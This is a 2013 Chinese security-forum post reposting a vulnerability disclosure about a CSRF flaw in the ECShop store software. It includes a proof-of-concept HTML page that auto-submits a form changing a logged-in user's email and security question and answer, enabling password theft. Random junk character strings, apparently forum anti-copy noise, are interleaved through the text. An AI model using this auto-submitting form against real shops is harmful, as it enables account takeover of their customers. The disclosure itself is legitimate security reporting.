找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1937|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:7 U! W0 _, V. n" T- {" F
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现; M: L% a1 b  ]. Z
& W' R! O( z- `1 T7 N
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
4 _% a: E0 ?$ r+ X$ b6 _- a) k
# U+ ~/ j- P$ C3 F1 \详细说明:
! B% b! [( E( I) _: i- A利用csrf和xss可以突破官方所说的“障碍”
& l$ ?7 m) a" }; Vxss版本已经有人说明
. W& _& u7 v: W* y: a5 W3 X: y这里给出csrf版本9 p/ G3 {  {! D5 v; e: B! d

1 p8 w' [! o; E0 j漏洞证明:
4 d8 c4 R! J+ `7 h  ~6 Q, c4 f4 i<html>
% r( n% t! R( ]2 T4 I9 ?$ `( n<body>! K4 b: m- v9 K5 B
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">: k, H" t' n9 Y. w7 u
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
# G3 a3 T$ l3 P7 l1 ?<INPUT TYPE="text" NAME="act" value="act_edit_profile">/ _0 e4 f1 l1 f% {8 ]& s  h
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
  D5 C6 _% {% g4 A* d! l. T<INPUT TYPE="text" NAME="passwd_answer" value="exploit">8 e( y) T4 y; k; D: `: L7 P% E
</body>
. f$ R! V0 J& |" h" O* R/ w! M<script>
% n' C( b6 A' P. T# t# odocument.forms[0].submit();+ ?% k; E! f$ h7 K, J* ?7 C( p/ w; N) [
</script>/ z9 m  P4 a! k
</html>: E! s  E( U+ U  C- a
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
3 b6 A6 F: j' M6 g) ~# ]! w% M# v& m
2 R& v! G. s- C: y+ i8 q" H+ q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表